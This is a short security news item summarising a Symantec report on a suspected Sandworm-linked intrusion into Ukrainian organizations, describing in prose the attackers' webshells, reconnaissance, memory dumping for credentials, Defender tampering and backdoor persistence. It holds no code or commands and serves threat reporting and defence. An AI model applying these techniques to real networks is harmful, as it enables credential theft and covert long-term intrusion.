Russian hackers, likely linked to Sandworm, exploit legitimate tools against Ukrainian targets

Russian threat actors, likely linked to the APT Sandworm, targeted Ukrainian organizations to steal sensitive data and maintain long-term network access, Symantec Threat Hunter Team and Carbon Black report. The attackers infiltrated a major business services firm for two months and a local government for a week, using living-off-the-land tactics and dual-use tools with minimal malware to evade detection.

Hackers exploited unpatched vulnerabilities to plant webshells like Localolive on servers. Microsoft previously linked Localolive to the Russian cyber espionage group Sandworm, which used it for initial access. The custom webshell enables C2, file uploads, and command execution.

Symantec observed that first intrusion signs began on June 27, 2025, when attackers installed a webshell via curl and ran reconnaissance (whoami, tasklist, systeminfo, domain queries). They disabled Defender scans for the Downloads folder, created scheduled tasks to dump memory (to harvest credentials), and exported registry hives.

Threat Hunter Team observed a second webshell starting from June 29, enabling further discovery and lateral movement to other hosts. On subsequent days, attackers enumerated files and processes (targeting KeePass), created recurring minidump tasks, and used rdrleakdiag for full memory dumps. Attackers ran suspicious executables from Downloads (service.exe, cloud.exe), executed a dotnet-install script, and deployed OpenSSH (enabling RDP/firewall rules and an SSH rule). The threat actors installed a persistent PowerShell backdoor scheduled every 30 minutes, executed an unknown Python payload, and used a legitimate winbox64 utility. Activity tapered, with the last observed malicious actions on August 20.

To read the complete article see: Security Affairs.